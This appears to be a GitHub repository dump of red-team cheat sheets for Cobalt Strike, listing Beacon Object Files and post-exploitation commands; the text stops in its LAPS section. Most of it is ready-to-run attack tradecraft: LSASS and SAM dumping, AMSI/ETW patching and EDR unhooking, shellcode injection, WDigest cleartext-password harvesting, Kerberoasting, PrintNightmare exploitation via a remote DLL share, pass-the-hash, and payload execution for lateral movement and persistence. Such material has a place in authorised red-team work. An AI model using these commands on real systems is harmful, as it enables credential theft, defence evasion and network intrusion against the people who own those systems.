├── CobaltStrike ├── BOF_Collections.md └── RedTeam_CheatSheet.md ├── README.md └── SliverC2 └── README.md /CobaltStrike/BOF_Collections.md: -------------------------------------------------------------------------------- 1 | # CobaltStrike BOF Collections 2 | Useful Cobalt Strike Beacon Object Files (BOFs) used during red teaming and penetration testing engagements. 3 | 4 | --- 5 | ### Enumeration 6 | 7 | - [**TrustedSec Situational Awareness BOF**](https://github.com/trustedsec/CS-Situational-Awareness-BOF)
8 | BOF that provides host enumeration and awarness commands which are more opsec friendly
9 | Example commands include:
10 | ``` 11 | arp --> List arp tables 12 | ipconfig --> Run ipconfig 13 | ldapsearch [query] 14 | listdns --> Pulls DNS cache 15 | netuser [username] [opt: domain] --> Get info on user account 16 | nslookup [hostname] --> Perform DNS query 17 | tasklist --> Get local running processes 18 | ``` 19 | 20 | - [**Find Objects BOF**](https://github.com/outflanknl/FindObjects-BOF)
21 | Use direct system calls to enumerate processes for specific loaded modules (amsi.dll, clr.dll) or process handles (lsass.exe)
22 | Avoids fork&run
23 | ``` 24 | FindModule amsi.dll 25 | FindProcHandle lsass.exe 26 | ``` 27 | 28 | - [**BOF Collection**](https://github.com/rvrsh3ll/BOF_Collection)
29 | A set of BOFs useful for enumeration and exploitation. Examples include:
30 | ``` 31 | inline-execute GetDomainInfo.o --> Get domain info from DC 32 | 33 | inline-execute GetClipboard.o --> Prints any text on the user's clipboard 34 | 35 | enumwifi --> Enumerate wifi connections 36 | dumpwifi Wifi_Profile_Name --> Dump wifi cleartext credentials 37 | 38 | bofportscan 192.168.1.10 3389 --> Port scanner 39 | 40 | inline-execute RegistryPersistence.o Install --> Install registry persistence 41 | inline-execute RegistryPersistence.o Remove --> Remove registry persistence 42 | ``` 43 | 44 | - [**whereami**](https://github.com/boku7/whereami)
45 | A "Where Am I" BOF which is a way to run the whoami.exe binary but in an opsec safe way by pulling the info from the current beacon process memory.
46 | Also pulls current environment variables.
47 | ```whereami``` 48 | 49 | - [**RiccardoAncarani BOFs**](https://github.com/RiccardoAncarani/BOFs)
50 | A useful BOF collection to perform various tasks in a safer opsec way. 51 | ``` 52 | send_shellcode_via_pipe --> Send shellcode or any byte via a named pipe 53 | cat --> Read file, supports remote shares 54 | wts_enum_remote_processes --> Enumerate remote processes using WTS APIs 55 | unhook , unhook ntdll.dll --> Use direct syscalls to unhook APIs of a specific DLL (works only on 64-bit beacons) 56 | ``` 57 | 58 | - [**Outflank C2 Tool Collection**](https://github.com/outflanknl/C2-Tool-Collection)
59 | Great list of useful tools converted to BOFs for better opsec.
60 | Tools like add machine account, kerberoast, LAPS password dump, SMB info, LDAP AD spray, and more! 61 | ``` 62 | GetMachineAccountQuota --> Get domain machine account quota 63 | AddMachineAccount [*Computername] [Optional Password] --> Create new machine account - requires MachineAccountQuota to create new account 64 | Domaininfo --> Enumerate AD domain 65 | Kerberoast list --> List SPN enabled accounts 66 | Kerberoast roast SamAccountName --> Kerberoast specific username 67 | Lapsdump --> Dump LAPS passwowrds on remote systems within AD (requires elevated privileges on target) 68 | Psc --> Show detailed information from processes with established TCP and RDP connections 69 | Psw --> Show window titles from processes with active windows 70 | Psx --> Show detailed information from all processes running on the system and provides a summary of installed security products and tools. 71 | Smbinfo --> Get SMB info of remote system instead of using CS portscan SMB 72 | Winver --> Shows the version of Windows that is running on the local system 73 | ``` 74 | 75 | - [**tgtdelegation**](https://github.com/sliverarmory/tgtdelegation)
76 | Kerberos ticket delegation - Obtain usable TGTs for the current user, does not require Admin privileges!
77 | Request TGT of active user in the current domain obtained from USERDNSDOMAIN environment variable, outputs TGT blobs to .kirbi and .ccache files
78 | ``` 79 | tgtdelegation currentdomain default 80 | [+] received output: 81 | [+] tgtdelegation succeeded! 82 | 83 | [+] Invoking tgtParse.py to obtain a usable .ccache! 84 | 85 | [+] Successfully decrypted the AP-REQ response! 86 | 87 | [+] Local path to usable .ccache: /home/loki@MARVEL.LOCAL.ccache 88 | [+] Local path to usable .kirbi: /home/loki@MARVEL.LOCAL.kirbi 89 | ``` 90 | Now use .ccache or .kirbi files offline on a Linux system to load TGT into memory:
91 | ```export KRB5CCNAME=/home/loki@MARVEL.LOCAL.ccache```
92 | Continue to use ticket in memory with other tooling of your choice through SOCKS proxy! (i.e. Impacket's `-k -no-pass` command)
93 | 94 | 95 | - [**PrivKit**](https://github.com/mertdas/PrivKit)
96 | Windows privilege escalation BOF kit used for detecting priv esc vulnerabilities including unquoted service paths, hijackable paths, autologon registry keys, etc.
97 | Check for all vulnerabilities supported:
98 | ```privcheck``` 99 | 100 | --- 101 | ### Executing .NET Assemblies 102 | 103 | - [**InlineExecute-Assembly**](https://github.com/anthemtotheego/InlineExecute-Assembly)
104 | Perform .NET assembly execution of any .NET executable without any prior modifications required
105 | The BOF also supports several flags to disabling AMSI via in memory patching, disabling and restoring ETW via in memory patching, or customization of the CLR App Domain name to be created
106 | ```inlineExecute-Assembly --dotnetassembly /home/Seatbelt.exe --assemblyargs AntiVirus AppLocker --etw --amsi --mailslot totallyLegitMailslot``` 107 | 108 | - [**inject-assembly**](https://github.com/kyleavery/inject-assembly)
109 | Another alternative .NET executable loader to inject an assembly into a running process
110 | ```inject-assembly 0 /home/Rubeus.exe [args...]``` 111 | 112 | - [**BOF.NET**](https://github.com/CCob/BOF.NET)
113 | Critical tool for red teams that allows you to run .NET assemblies as BOFs within the beacon process
114 | ``` 115 | bofnet_init --> Start BOF.NET 116 | bofnet_listassemblies --> List loaded .NET assemblies 117 | bofnet_load /Path/To/Assembly.exe --> Load assembly 118 | bofnet_execute bof_name [args] --> Execute assembly 119 | bofnet_shutdown --> Kill BOF.NET 120 | ``` 121 | 122 | - [**Modified BOF.NET**](https://github.com/williamknows/BOF.NET/tree/main)
123 | Updated BOF.NET repo with the added `bofnet_executeassembly` command to easily call .NET assemblies
124 | ``` 125 | bofnet_init --> Start BOF.NET 126 | bofnet_load /Path/To/Assembly.exe --> Load assembly 127 | bofnet_executeassembly AssemblyName arg1 arg2 arg3 --> Execute .NET assembly 128 | bofnet_executeassembly Seatbelt -group=remote --> SeatBelt execution example 129 | bofnet_shutdown --> Kill BOF.NET 130 | ``` 131 | 132 | --- 133 | ### Exploitation 134 | 135 | - [**ajpc500 BOFs**](https://github.com/ajpc500/BOFs)
136 | A collection of **very** useful BOFs for various utilities including different techniques of shellcode injection with syscalls, process dumping (LSASS!), and patching ETW for better evasion.
137 | ``` 138 | etw stop --> Patch etw 139 | syscalls_inject / syscalls_shinject --> Syscalls shellcode injection 140 | syscalls_spawn / syscalls_shspawn --> Spawn and syscalls injections 141 | static_syscalls_apc_spawn / static_syscalls_apc_spawn --> Spawn and static syscalls shellcode njection (NtQueueApcThread) 142 | static_syscalls_inject / static_syscalls_shinject --> Static syscalls shellcode injection (NtCreateThreadEx) 143 | static_syscalls_dump [path_to_output] --> Process dump with syscalls (i.e. Dump LSASS!) 144 | ``` 145 | 146 | - [Threadless Inject BOF](https://github.com/iilegacyyii/ThreadlessInject-BOF) 147 | This process injection BOF has to be used by remotely hooking a function and specify which DLL/function you want to target for injecting shellcode into.
148 | ``` 149 | threadless-inject 150 | threadless-inject 1234 ntdll.dll NtOpenFile shellcode.bin --> Inject into existing process 151 | ``` 152 | 153 | - [**MiniDumpWriteDump**](https://github.com/rookuu/BOFs)
154 | Uses static syscalls to dump a process such as LSASS to output file
155 | ```minidumpwritedump ``` 156 | 157 | - [**SilentLsassDump**](https://github.com/josephkingstone/BOFs-2/)
158 | Uses direct syscalls generated from [https://github.com/outflanknl/InlineWhispers](InlineWhispers)
159 | Dump the LSASS process via the silent process exit mechanism into the C:\Temp directory
160 | ```silentLsassDump ``` 161 | 162 | - [**RegSave BOF**](https://github.com/EncodeGroup/BOF-RegSave)
163 | BOF to dump SAM, SYSTEM, and SECURITY database from a local system.
164 | ``` 165 | bof-regsave c:\temp\ --> Dumps SAM database files to target folder C:\temp\ 166 | ``` 167 | 168 | - [**Unhook BOF**](https://github.com/rsmudge/unhook-bof)
169 | Created by Raphael Mudge, this BOF will attempt to unhook userland APIs to bypass EDR
170 | Sort of the "hail mary" for attempting to unhook APIs
171 | ```unhook``` 172 | 173 | - [**WdToggle**](https://github.com/outflanknl/WdToggle)
174 | Enables WDigest credential caching using direct system calls
175 | Bypasses Windows Credential Guard if enabled
176 | ``` 177 | inline-execute WdToggle.o --> First enable WdDigest caching 178 | logonpasswords --> Second, wait for users to login and then run Mimikatz to dump their newly cached cleartext passwords 179 | ``` 180 | 181 | - [**TrustedSec CS-Remote-OPs-BOF**](https://github.com/trustedsec/CS-Remote-OPs-BOF)
182 | Great repo of new BOFs from TrustedSec to follow up their SituationalAwareness BOFs.
183 | Includes dumping a process, decrypting Chrome keys, persistence techniques (registry, scheduled tasks, services), and more! 184 | ``` 185 | adcs_request --> Request an enrollment certificate 186 | procdump --> Dump specified process to output file 187 | reg_set --> Set/create a registry key 188 | sc_create --> Create a new service 189 | schtaskscreate --> Create a new scheduled task 190 | setuserpass --> Set a users password 191 | ``` 192 | 193 | - [**Inject AMSI Bypass**](https://github.com/boku7/injectAmsiBypass)
194 | BOF that bypasses AMSI in a remote process with code injection
195 | ```inject-amsiBypass ``` 196 | 197 | - [**Inject ETW Bypass**](https://github.com/boku7/injectEtwBypass)
198 | Inject ETW Bypass into Remote Process via Syscalls
199 | ```injectEtwBypass ``` 200 | 201 | - [**Kerberoast BOF**](https://github.com/cube0x0/BofRoast)
202 | BOF for targeted Kerberoasting against input SPN to roast
203 | Returns TGS that you can pass to apreq2hashcat.py (provided in repo) to output the hashcat format
204 | ```kerberoast SPN/HOSTNAME.domain.local``` 205 | 206 | - [**Koh**](https://github.com/GhostPack/Koh)
207 | GhostPack BOF that allows for the capture of user credentials via purposeful token/logon session leakage.
208 | Koh has a BOF client for capturing logon tokens in Cobalt Strike and a C# capture server to negotiate captured tokens for new logon sessions.
209 | ``` 210 | # Koh client BOF 211 | help koh 212 | koh list - lists captured tokens 213 | koh groups LUID - lists the group SIDs for a captured token 214 | koh filter list - lists the group SIDs used for capture filtering 215 | koh filter add SID - adds a group SID for capture filtering 216 | koh filter remove SID - removes a group SID from capture filtering 217 | koh filter reset - resets the SID group capture filter 218 | koh impersonate LUID - impersonates the captured token with the give LUID 219 | koh release all - releases all captured tokens 220 | koh release LUID - releases the captured token for the specified LUID 221 | koh exit - signals the Koh server to exit 222 | 223 | koh list --> List current logon sessions 224 | koh impersonate --> Impersonate a logon session from above output 225 | 226 | ls \\dc.theshire.local\C$ --> Use the impersonated privileged logon session to interact with a target system 227 | ``` 228 | 229 | - [**Cobalt-Clip**](https://github.com/DallasFR/Cobalt-Clip)
230 | A clipboard add-on for Cobalt Strike to interact with the victim's clipboard. With Cobalt-Clip you can dump, edit and monitor the content of a clipboard.
231 | ``` 232 | dumpclip --> Dump current contents of clipboard 233 | set-clipboard-data --> Modify victims clipboard data 234 | clipmon --> Monitor the clipboard for new content and output to console 235 | ``` 236 | 237 | - [**BOF-patchit**](https://github.com/ScriptIdiot/BOF-patchit/)
238 | A very easy solution to patch AMSI or ETW. Patches AMSI/ETW for the currently running x64 process. 239 | ``` 240 | patchit check --> List if AMSI or ETW are currently patched 241 | patchit all --> Patch both AMSI and ETW 242 | patchit amsi --> Only patch AMSI 243 | patchit etw --> Only patch ETW 244 | 245 | # DO NEFARIOUS STUFF HERE.... 246 | 247 | patchit revertAll --> Revert both AMSI and ETW 248 | patchit revertAmsi --> Revert only AMSI 249 | patchit revertEtw --> Revert only ETW 250 | ``` 251 | 252 | - [**ScreenshotBOF**](https://github.com/CodeXTF2/ScreenshotBOF)
253 | Uses WinAPI and avoids fork&run to take a screenshot.
254 | `screenshot_bof output.bmp 1` 255 | 256 | - [**nanorubeus**](https://github.com/wavvs/nanorobeus)
257 | BOF equivalent of Rubeus for managing Kerberos tickets. It can be used cross-platform for multiple C2s including Cobalt Strike, Sliver and Brute Ratel.
258 | ``` 259 | nanorobeus64 luid --> Get logon current ID 260 | nanorobeus64 klist --> List all Kerberos tickets 261 | nanorobeus64 dump /all --> Dump all Kerberos tickets, requires local admin privileges 262 | nanorobeus64 kerberoast /spn:HTTP/server.fortress.local --> Kerberoast a specific SPN 263 | ``` 264 | 265 | --- 266 | ### Miscellaneous 267 | - [**BOF Template**](https://github.com/Cobalt-Strike/bof_template)
268 | Used for creating your very own BOFs! 269 | 270 | - [**BOF Hound**](https://github.com/fortalice/bofhound)
271 | An offline BloodHound ingestor and LDAP parser to be used with TrustedSec's ["ldapsearch"](https://github.com/trustedsec/CS-Situational-Awareness-BOF).
272 | Use ldapsearch in Cobalt Strike to gather data and then use bofhound on your CS logs to generate JSON files for importing into BloodHound.
273 | ```bofhound -o /data/``` 274 | 275 | - [**Help Color**](https://github.com/outflanknl/HelpColor)
276 | Color helper Aggressor script for coloring "help" output based on command type and OPSEC
277 | ```helpx``` 278 | 279 | - [**Hidden Desktop BOF**](https://github.com/WKL-Sec/HiddenDesktop)
280 | Uses VNC connection and server to create a hidden remote desktop connection to your target instead of using RDP.
281 | ``` 282 | Start the HVNC server first 283 | HiddenDesktop --> Start a hidden desktop client connection to your listening server 284 | hd-launch-explorer --> Then start the Windows explorer browser which should pop up a new window on your system 285 | ``` 286 | -------------------------------------------------------------------------------- /CobaltStrike/RedTeam_CheatSheet.md: -------------------------------------------------------------------------------- 1 | # Cobalt Strike Red Team Cheat Sheet 2 | 3 | ## Overview 4 | - [Malleable C2 Profiles](#malleable-c2-profiles) 5 | - [Reflective Shellcode Loaders](#reflective-shellcode-loaders) 6 | - [Domain Enumeration](#domain-enumeration) 7 | - [Local Privilege Escalation](#local-privilege-escalation) 8 | - [Lateral Movement](#lateral-movement) 9 | - [Domain Privilege Escalation](#domain-privilege-escalation) 10 | - [Defense Evasion](#defense-evasion) 11 | - [Exploitation](#exploitation) 12 | - [Exfiltration - Password Attacks](#exfiltration---password-attacks) 13 | - [Exfiltration - Email](#exfiltration---email) 14 | - [Persistence](#persistence) 15 | - [Cobalt Strike BOFs](#cobalt-strike-bofs) 16 | - [References](#references) 17 | 18 | ----------------------------------------------------------------------------------------- 19 | 20 | #### Important OPSEC notes... 21 | For an actual red team, do NOT use `execute-assembly` at all, ever! Instead, sub the command for [BOF.NET](https://github.com/CCob/BOF.NET/pull/1) `bofnet_executeassembly` or another .NET assembly loader BOF (i.e. [InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)).
22 | For everything else, use BOFs instead of `run` or `shell` commands for best OPSEC. ([BOF cheat sheet here](https://github.com/wsummerhill/C2_RedTeam_CheatSheets/blob/main/CobaltStrike/BOF_Collections.md)). 23 | 24 | ----------------------------------------------------------------------------------------- 25 | ## Malleable C2 Profiles 26 | 27 | A collection of tools used to generate new malleable C2 profiles to use with Cobalt Strike and better obfuscate your traffic/commands. 28 | 29 | - [Random C2 Profile](https://github.com/threatexpress/random_c2_profile) 30 | - [Malleable C2](https://github.com/threatexpress/malleable-c2) 31 | - [Malleable C2 Profiles](https://github.com/xx0hcd/Malleable-C2-Profiles) 32 | - [C2concealer](https://github.com/FortyNorthSecurity/C2concealer) 33 | - [SourcePoint](https://github.com/Tylous/SourcePoint) 34 | 35 | ----------------------------------------------------------------------------------------- 36 | ## Reflective Shellcode Loaders 37 | 38 | Shellcode loaders to add in Cobalt Strike before generating your shellcode which are used to reflectively generate shellcode for added obfuscation, encryption, and ultimately better evasion. 39 | 40 | - [AceLdr](https://github.com/kyleavery/AceLdr) 41 | - [TitanLdr](https://github.com/benheise/TitanLdr) 42 | - [BokuLoader](https://github.com/boku7/BokuLoader) - Bobby Cooke's reflective loader 43 | 44 | ----------------------------------------------------------------------------------------- 45 | ## Domain Enumeration 46 | 47 | Running PowerView and SharpView 48 | ``` 49 | # PowerView: 50 | powershell-import --> Select PowerView.ps1 to import PS1 file in memory 51 | powershell Get-Module PowerView 52 | powershell Get-NetUser -Identity testuser -Domain lab.com 53 | 54 | # SharpView 55 | execute-assembly C:\SharpView.exe Invoke-CheckLocalAdminAccess --> Check servers for local admin using current privileges 56 | ``` 57 | 58 | Running Sharphound (.NET version of Bloodhound) for AD domain collection 59 | ``` 60 | # Running SharpView in memory (.NET version of PowerView) 61 | execute-assembly C:\SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\users\testuser\appdata\local\temp\ 62 | 63 | # Collecting only user sessions to determine who is logged in and where: 64 | execute-assembly C:\SharpHound.exe --CollectionMethod Session,LoggedOn --Outputdirectory C:\temp\ 65 | 66 | # Collection methods reference: https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound-all-flags.html 67 | ``` 68 | 69 | [AD Recon tool](https://github.com/adrecon/ADRecon) - Perform different collection methods (ACLs, OUs, DCs, etc.) and output to Excel files 70 | ``` 71 | powershell-import --> ADRecon.ps1 72 | # Perform all collection methods: 73 | powershell ADRecon -OutputDir .\ -DomainController ops-dc.lab.com 74 | ``` 75 | 76 | Get domain trusts and domain controllers with built-in `nltest.exe` utility 77 | ``` 78 | # Get all domain controllers of a domain 79 | run nltest /dclist:domain.com 80 | # Get domain trusts 81 | run nltest /trusted_domains 82 | ``` 83 | 84 | ### Domain SMB Share Enumeration
85 | [PowerView](https://powersploit.readthedocs.io/en/latest) 86 | ``` 87 | powershell-import --> Select PowerView.ps1 to import PS1 file in memory 88 | # Find all domain shares that the current user has access to 89 | powershell Find-DomainShare -CheckShareAccess 90 | 91 | # Find interesting domain share files 92 | powershell Find-InterestingDomainShareFile -ComputerDomain DOMAIN.COM 93 | ``` 94 | 95 | [SharpShares](https://github.com/mitchmoser/SharpShares) - List accessible shares on remote systems and check read/write privileges
96 | ``` 97 | # Find all accessible network shares in a domain, exclude default share names (SYSVOL,netlogon,ipc$,print$), and perform read/write access checks 98 | execute-assembly C:\SharpShares.exe /ldap:all /filter 99 | 100 | # Find all server shares (including DCs), exclude default share names, perform read/write access checks and output to file 101 | execute-assembly C:\SharpShares.exe /ldap:servers /filter /outfile:find-domain-shares.txt 102 | ``` 103 | 104 | [Snaffler](https://github.com/SnaffCon/Snaffler) - Automated network share enumeration to look for interesting files/creds 105 | ``` 106 | # Run Snaffler on all domain systems found, output to console and file 107 | execute-assembly C:\snaffler.exe -d DOMAN.COM -s -o C:\temp\snaffler.log 108 | 109 | # Run Snaffler on only target hosts 110 | execute-assembly C:\snaffler.exe -s -o C:\temp\snaffler2.log -n hostname1.domain.com,hostname2.domain.com,hostname3.domain.com 111 | ``` 112 | 113 | ### Miscellaneous Remote Workstation/Server stuff 114 | 115 | List and kill processes on remote system (requires local Admin) 116 | - Using tasklist.exe and taskkill.exe
117 | ``` 118 | run tasklist /s SERVER.domain.com --> List remote processes 119 | run taskkill /s SERVER.domain.com /IM PROCESS.exe --> Kill remote process 120 | ``` 121 | - Using [CIMplant](https://github.com/FortyNorthSecurity/CIMplant)
122 | ``` 123 | execute-assembly CIMplant.exe -s [remote-IP-address] -c ps --> List remote processes 124 | execute-assembly CIMplant.exe -s [remote-IP-address] -c process_kill --> Kill remote process 125 | ``` 126 | ----------------------------------------------------------------------------------------- 127 | ## Local Privilege Escalation 128 | 129 | ### [PowerUp](https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1) - PowerSploit module 130 | ``` 131 | powershell-import --> PowerUp.ps1 132 | powerpick Invoke-AllChecks | Out-File -Encoding ASCII PowerUp-checks.txt 133 | ``` 134 | 135 | ### [SharpUp](https://github.com/GhostPack/SharpUp) - .NET port of PowerUp 136 | ``` 137 | # Run all checks automatically - output to console 138 | execute-assembly C:\SharpUp.exe audit 139 | 140 | # Run an individual check 141 | execute-assembly SharpUp.exe HijackablePaths 142 | ``` 143 | 144 | ### [WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe) - Windows Privilege Escalation Awesome Script
145 | ```execute-assembly winpeas.exe #run all checks```
146 | 147 | ### [SeatBelt](https://github.com/GhostPack/Seatbelt) - .NET tool by GhostPack 148 | GREAT tool to query a local system to gather system/user/remote/misc data 149 | Can be used as Admin or normal-privileged user 150 | ``` 151 | # Run ALL checks - returns TONS of data 152 | execute-assembly C:\SeatBelt.exe -group=all -full -outputfile="C:\Temp\SeatBelt-all.json" 153 | 154 | # Run only user-related checks - returns things like Chrome data, DPAPI keys, IE tabs, Windows vault/credentials, etc. 155 | execute-assembly C:\SeatBelt.exe -group=user -outputfile="C:\Temp\SeatBelt-user.json" 156 | 157 | # Run only system-related checks - returns things like Antivirus, Applocker, env path/variables, local users/groups, WMI, sysmon, UAC, etc. 158 | execute-assembly C:\SeatBelt.exe -group=system -outputfile="C:\Temp\SeatBelt-system.json" 159 | 160 | # Run only Chrome checks - returns bookmarks, history, presence 161 | execute-assembly C:\SeatBelt.exe -group=chromium -outputfile="C:\Temp\SeatBelt-chrome.json" 162 | 163 | # Run only remote-related checks - returns things like network shares, putty sessions, RDP connections/settings, Filezilla, Windows firewall, etc. 164 | execute-assembly C:\SeatBelt.exe -group=remote -outputfile="C:\Temp\SeatBelt-remote.json" 165 | 166 | # Run only miscellaneous-related checks - returns things like Chrome data, logon events, LOBAS, interesting files, downloads, PS events, scheduled tasks, etc. 167 | execute-assembly C:\SeatBelt.exe -group=misc -outputfile="C:\Temp\SeatBelt-misc.json" 168 | ``` 169 | 170 | ### Watson - .NET version of Sherlock.ps1 to look for missing KBs on Windows 171 | ``` 172 | # Peroform all checks and output to console 173 | # Supports: 174 | Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004 175 | Server 2016 & 2019 176 | execute-assembly C:\Watson.exe 177 | ``` 178 | 179 | ### PrintNightmare priv esc exploit (CVE-2021-3452) 180 | ``` 181 | # Impacket's PrintNightmare: https://github.com/cube0x0/CVE-2021-1675 182 | # Impacket's SharpNightmare (Csharp): https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare 183 | # PowerShell PrintNightmare local priv esc: https://github.com/calebstewart/CVE-2021-1675 184 | 185 | # Local priv esc 186 | execute-assembly C:\SharpPrintNightmare.exe C:\addCube.dll 187 | 188 | # RCE using existing context 189 | execute-assembly C:\SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20' 190 | 191 | # RCE using runas /netonly 192 | execute-assembly C:\SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123 193 | ``` 194 | 195 | ### HiveNightmare priv esc SAM dump (CVE-2021–36934) 196 | Exploit in Windows 10 and 11 which allows you to read the SAM, SYSTEM and SECURITY hives as a low-privileged user 197 | ``` 198 | # First check privileges to read SAM hive 199 | run icacls C:\Windows\System32\config\SAM 200 | --> If the results show success and the group BUILTIN\Users has privileges (I)(RX) then the SAM file should be readable by all users! 201 | 202 | # Exploit: Csharp implementation (https://github.com/cube0x0/CVE-2021-36934) 203 | execute-assembly C:\CVE-2021-36934.exe 204 | --> Dumps hashes to console upon successful exploitation 205 | ``` 206 | 207 | ### Stealing logon tokens 208 | If you obtained local Administrator privileges, you can steal a session token of another process to inherit their token privileges. This might require you to escalate to a SYSTEM Beacon if its being blocked.
209 | `steal_token ` 210 | 211 | ### Elevating to SYSTEM Beacon 212 | Assuming you gained local administrator privileges, one option to elevate to a SYSTEM Beacon is to use scheduled tasks to create a new scheduled task to run your payload as SYSTEM.
213 | ``` 214 | run schtasks /create /tn "TaskName" /sc once /U DOMAIN\username /P Password1! /tr "cmd.exe /c C:\path\to\Payload.exe" /ru SYSTEM 215 | run schtasks /run /tn "TaskName" --> Should pop SYSTEM Beacon 216 | ``` 217 | 218 | ------------------------------------------------------------------------------------------ 219 | ## Lateral Movement 220 | Cobalt Strike jumping (OUTDATED) 221 | ``` 222 | # Jump using WinRM if it's enabled for the current user on the target system 223 | jump winrm64 ops-jumpbox.lab.com HTTPSLISTENER 224 | 225 | # Jump using PsExec if it's enabled for the current user on the target system 226 | jump psexec64 ops-jumpbox.lab.com HTTPSLISTENER 227 | ``` 228 | 229 | Cobalt Strike remote-exec - Executes commands on a target system using psexec, winrm or wmi (OUTDATED) 230 | ``` 231 | # remote-exec using WMI 232 | remote-exec wmi ops-jumpbox.lab.com cmd.exe /c "C:\Users\Public\payload.exe" 233 | 234 | # remote-exec using PsExec 235 | remote-exec psexec ops-jumpbox.lab.com cmd.exe /c "C:\Users\Public\payload.exe" 236 | ``` 237 | 238 | Enable Powershell Remoting manually 239 | ``` 240 | # Enable on local system with Admin privileges 241 | powershell Enable-PSRemoting –Force 242 | 243 | # Enable on remote system 244 | make_token AD\admin Password123! --> Token with Admin privileges on remote system is required 245 | run psexec.exe \\TestComputer.lab.com -h -s powershell.exe Enable-PSRemoting -Force 246 | 247 | # Test remote access 248 | powershell Invoke-Command -ComputerName TestComputer -ScriptBlock { whoami; hostname } 249 | ``` 250 | 251 | [RACE.ps1](https://github.com/samratashok/RACE): ACL attacks for lateral movement, persistence and privilege escalation 252 | Stealthier than above method since it doesn't touch disk 253 | ``` 254 | powershell-import --> RACE.ps1 255 | make_token AD\Admin password --> This tool requires Admin privileges on the remote system being targeted 256 | 257 | powershell Set-RemotePSRemoting -SamAccountName testuser -ComputerName ops-jumpbox.lab.com --> Force enable PS remoting for the specific user 258 | powershell Set-RemoteWMI -SamAccountName testuser -Computername ops-jumpbox.lab.com --> (Optional) Force enable WMI for the specific user 259 | 260 | # Now we can move laterally in CS with WinRM for the specified user 261 | make_token AD\testuser password 262 | jump [winrm/winrm64] ops-jumpbox.lab.com HTTPSLISTENER 263 | ``` 264 | 265 | Scheduled task lateral movement 266 | ``` 267 | # First copy payload files to remote system manually 268 | # Create task on remote system 269 | run schtasks /create /tn "MyTask" /sc once /U DOMAIN\username /P Password1! /S target-host.domain.com /tr "cmd.exe /c C:\Windows\temp\Payload.exe" 270 | # Execute remote task 271 | run schtasks /run /tn "MyTask" /S target-host.domain.com 272 | ``` 273 | 274 | [Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash) - PS tools to perform SMB and WMI pass-the-hash attacks 275 | ``` 276 | powershell-import 277 | powerpick Invoke-WMIExec -Target 192.168.100.20 -Domain LAB.com -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose 278 | powerpick Invoke-SMBExec -Target 192.168.100.20 -Domain LAB.com -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose 279 | ``` 280 | 281 | Over-pass-the-hash with Rubeus 282 | Inject a ticket into memory using known credentials and then move to a system that user has access to 283 | ``` 284 | # Revert to original token in CS 285 | rev2self 286 | # Create and inject new ticket into memory 287 | execute-assembly C:\Rubeus.exe asktgt /domain:lab.com /user:admin1 /rc4: /ptt 288 | # Run network commands as that user 289 | ls \\jumpbox.lab.com\C$ 290 | jump winrm64 jumpbox.lab.com 291 | ``` 292 | 293 | [Move Kit](https://github.com/0xthirteen/MoveKit) 294 | Aggressor script using execute-assembly, SharpMove and SharpRPD assemblies for doing lateral movement with various techniques 295 | 296 | [SharpExec](https://github.com/anthemtotheego/SharpExec) - CSharp tooling lateral movement 297 | ``` 298 | # WMI lateral movement 299 | execute-assembly SharpExec.exe -m=wmi -i=IPADDRESS -u=USER -p=PASSWORD -d=DOMAIN -e=C:\Windows\System32\cmd.exe -c="/c C:\path\to\payload" 300 | 301 | # PSExec lateral movement 302 | execute-assembly SharpExec.exe -m=psexec -i=IPADDRESS -u=USER -p=PASSWORD -d=DOMAIN -e=C:\Windows\System32\cmd.exe -c="/c C:\path\to\payload" 303 | ``` 304 | 305 | ------------------------------------------------------------------------------------------ 306 | ## Domain Privilege Escalation 307 | ### GPP Passwords 308 | [Get-GPPPassword.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1) PowerSploit module 309 | ``` 310 | # Get-GPPPassword Searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords 311 | powershell-import --> Get-GPPPassword.ps1 312 | powerpick Get-GPPPassword -Server ops-dc01.lab.com 313 | ``` 314 | [Net-GPPPassword](https://github.com/outflanknl/Net-GPPPassword) .NET port of get-gpppassword 315 | ``` 316 | execute-assembly C:\Net-GPPPassword.exe lab.com 317 | ``` 318 | [Get-GPPAutologon.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPAutologon.ps1) PowerSploit module 319 | ``` 320 | # Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password 321 | powershell-import --> Get-GPPAutologon.ps1 322 | powerpick Get-GPPAutolgon 323 | ``` 324 | 325 | ### LAPS Passwords 326 | [SharpLaps](https://github.com/swisskyrepo/SharpLAPS) - Retrive LAPS password from AD
327 | The attribute ms-mcs-AdmPwd stores the clear-text LAPS password which is targeted here from LDAP
